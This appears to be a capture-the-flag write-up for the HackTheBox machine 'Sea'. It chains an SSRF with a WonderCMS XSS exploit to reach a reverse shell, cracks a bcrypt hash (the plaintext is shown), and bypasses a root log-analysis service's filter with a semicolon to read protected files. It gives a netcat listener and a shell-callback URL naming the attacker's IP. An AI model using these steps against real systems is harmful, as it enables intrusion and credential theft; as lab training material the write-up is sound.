Metadata
- Platform: HackTheBox
- CTF: Sea
- Difficulty: Easy
Summary
On this machine, we encounter a SSRF over a contact field, in combinations with an exploit for the utilized CMS, which leverages a XSS vulnerability. In combination, we gain a reverse shell. To get to the user account, we crack a hash in a JavaScript file.
Afterward, we encounter a locally run webpage analyzing log files for malicious patterns. Since this tool runs with root access, we can trick the filter and read any file on the system.
Solution
Reconnaissance
A scan with Nmap returns two services:
However, both services don’t have any available CVEs. We therefore enumerate the HTTP Server.
When we visit the website we see links to the domain sea.htb
, which we add to our host file. The website itself does not offer any functionality apart from the contact page on http://sea.htb/contact.php
.
Gobuster returns some more interesting directories for this domain. It identifies http://sea.htb/themes/bike/
. Running Gobuster for this directory returns some files:
The version
file contains 3.2.0
, and LICENSE
discloses that this theme was made by turboblack
. After some google searches, this theme seems to be made for WonderCMS
, which is therefore likely running on this machine.
User Flag
The contact page has a registration form, which contains a website field. Let’s see what happens with the input in that field.
We start an HTTP server on port 80 and check for possible connections.
The website actually connects to the specified URL, which means we have an angle for a server-side request forgery (SSRF):
In addition to this, there is a public exploit for the CMS and version used on this website: GitHub - prodigiousMind/CVE-2023-41425: WonderCMS Authenticated RCE - CVE-2023-41425 This exploit allows adding a custom theme via reflected XXS, which can contain a reverse shell. However, this exploit requires the application to visit a specified link. This works for us, since we found the SSRF.
Since the exploit downloads a theme from GitHub, which conflicts with the missing internet connection of the machine, we need to host the theme ourselves and customize the exploit.
Let’s run this exploit:
Which generates this link for us to trigger with the SSRF:
We can see the incoming request of the XSS script, as well as the hosted theme
After opening up a port via Netcat nc -lvnp 1234
, we invoke the shell by hitting the URL http://sea.htb/themes/exploit/rev.php?lhost=10.10.14.204&lport=1234
, which the exploit specifies. We get a shell as www-data
.
In the web server directory, we find the folder data
, which contains databse.js
. In this file we find the password hash $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
.
After saving the hash to a file, and calling Hashcat, it detects the hash as bcrypt $2*$, Blowfish (Unix)
. To crack it, we call Hashcat with mode 3200:
It returns $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance
, with which we gain access to the user amay
and the user flag.
Root Flag
The account does not have any system privileges to abuse, such as SUIDs or sudo access over any commands. However, Netstat reveals connections to a local service on port 8080:
Since we can’t access this website in the shell with a GUI, we need to tunnel the port to our host. amay
has SSH access with which this is possible.
This site prompts a username and password input, but amay
’s credentials suffice. The web page contains a service for monitoring the system and analyzing log files.
After intercepting the request made by the analyze
button, we can change the specified log file. So why not try to read a file, for which we don’t have permissions, such as /etc/shadow
. Surprisingly, we can read the file, meaning we have unrestricted file read access, as long as the service’s filter finds any pattern, which would be suspicious in a log file. After trial and error, entering the file as /root/root.txt;
(adding a semicolon), tricking the filter and allowing the root flag’s retrieval.